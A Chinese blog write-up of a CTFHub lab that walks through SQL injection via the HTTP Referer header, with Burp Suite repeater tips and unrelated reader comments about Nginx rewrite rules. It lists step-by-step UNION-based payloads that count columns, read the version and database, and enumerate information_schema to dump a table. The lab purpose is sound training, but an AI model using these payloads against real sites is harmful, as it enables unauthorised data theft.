CTFHub | Refer注入
最新推荐文章于 2024-04-09 21:52:17 发布
阅读量1.9k
收藏
1
点赞数
3
0x00 前言
CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。
0x01 题目描述
Refer注入:
(无)
0x02 解题过程
根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer 请求中使用 payload 进行测试,发现此题存在 Refer 注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
Ⅰ老规矩,直接使用burp suite抓包工具抓取题目网站的信息
Ⅱ这次为了方便查看,将抓取到的数据发送给重放器
Ⅲ发现抓到的信息中没有Refer请求,那么可以直接写入Refer请求进行测试
Referer: 1 and 1 = 1 #注意Refer请求写入信息名称为Referer
Ⅳ继续写入Referer请求中使用进行测试,发现此题存在Refer注入
Referer: 1 and 1 = 2
Ⅴ使用order by 判断字段数量,从order by 1开始
Referer: 1 order by 1Ⅵ判断字段2,使用order by 2
Referer: 1 order by 2Ⅶ判断字段3,使用order by 3,这里无回显,那么字段数量为2列
Referer: 1 order by 3Ⅷ知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据
Referer: 1 union select 1,2
Ⅸ判断数据可能不存在数据库中,将1改为0查看数据,其他符号也可以
Referer: 0 union select 1,2
Ⅹ修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22
Referer: 0 union select 1,version()
ⅩⅠ修改2为database(),查看数据库名,发现数据库版本为sqli
Referer: 0 union select 1,database()
ⅩⅡ查看全部数据库名
Referer: 0 union select 1,group_concat(schema_name)from information_schema.schemata
ⅩⅢ在全部数据库名中发现sqli,最后在sqli数据库中发现cirdpxhnev和news两个表名
Referer: 0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
ⅩⅣ先查看cirdpxhnev表中的全部字段名,发现一个数据名为ncdiyxjtck
Referer: 0 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cirdpxhnev'
ⅩⅤ查看数据ncdiyxjtck中的内容,发现此题flag
Referer: 0 union select 1,group_concat(ncdiyxjtck) from sqli.cirdpxhnev
0x03 Refer 注入常见的问题
1.Refer 和 Referer
需要注意的是,Refer 只是注入名称,而 Referer 是 header 的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上 Referer ,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
2.重放 Referer 注入无回显
有小伙伴私信我,为什么我使用 burp suite 工具进行重放的时候,页面没有正常回显。我第一次使用 burp suite 工具的重放器也犯过此类错误,就是写入一个请求时在其数据的空白行中写入数据。需要注意的是,这个空白行也算抓取到的数据。
例如,重放一个演示请求,数据为 error ,写入位置为抓取到的数据空白行中。重放发现页面没有正常回显。
那么在写入的数据后面加入一行空白行,重新执行重放,此时的页面可以正常回显。
0x04 参考文献
[1].mdn web docs. Referer[EB/OL]. [2022-11-26]. https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Referer.
[2].百度百科. HTTP_REFERER[EB/OL]. [2022-11-26]. https://baike.baidu.com/item/HTTP_REFERER/5358396.
[3].老司机开代码. Less19 (referer注入)[EB/OL]. [2022-11-26]. https://blog.csdn.net/weixin_43901998/article/details/107021685.
0x05 总结
文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。
扫一扫
444
暂无认证
到【灌水乐园】发言
2401_86935466: 在这里
尼泊罗河伯: 您好,试试重新配置Nginx, [code=javascript] rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlKey=$1 last; rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" /index.php?do=do&auth=$1&domain=$3 last; rewrite "^/register/(.*?)$" /index.php?do=register&key=$1 last; rewrite "^/register-validate/(.*?)$" /index.php?do=register&act=validate&key=$1 last; [/code]
为几何欢: [code=plain] ######################## default ############################ server { listen 80; server_name _; access_log /data/wwwlogs/access_nginx.log combined; root /data/wwwroot/default; index index.html index.htm index.php; #error_page 404 /404.html; #error_page 502 /502.html; rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlKey=$1 last; rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" /index.php?do=do&auth=$1&domain=$3 last; rewrite "^/register/(.*?)$" /index.php?do=register&key=$1 last; rewrite "^/register-validate/(.*?)$" /index.php?do=register&act=validate&key=$1 last; location /nginx_status { stub_status on; access_log off; allow 127.0.0.1; deny all; } location ~ [^/]\.php(/|$) { #fastcgi_pass remote_php_ip:9000; fastcgi_pass unix:/dev/shm/php-cgi.sock; fastcgi_index index.php; include fastcgi.conf; } location ~ .*\.(gif|jpg|jpeg|png|bmp|swf|flv|mp4|ic [/code]
尼泊罗河伯: 可能是 0x07 配置伪静态页面 这个步骤出问题了,截图我看一下配置文件。
尼泊罗河伯: 您好有截图吗,看一下具体是什么情况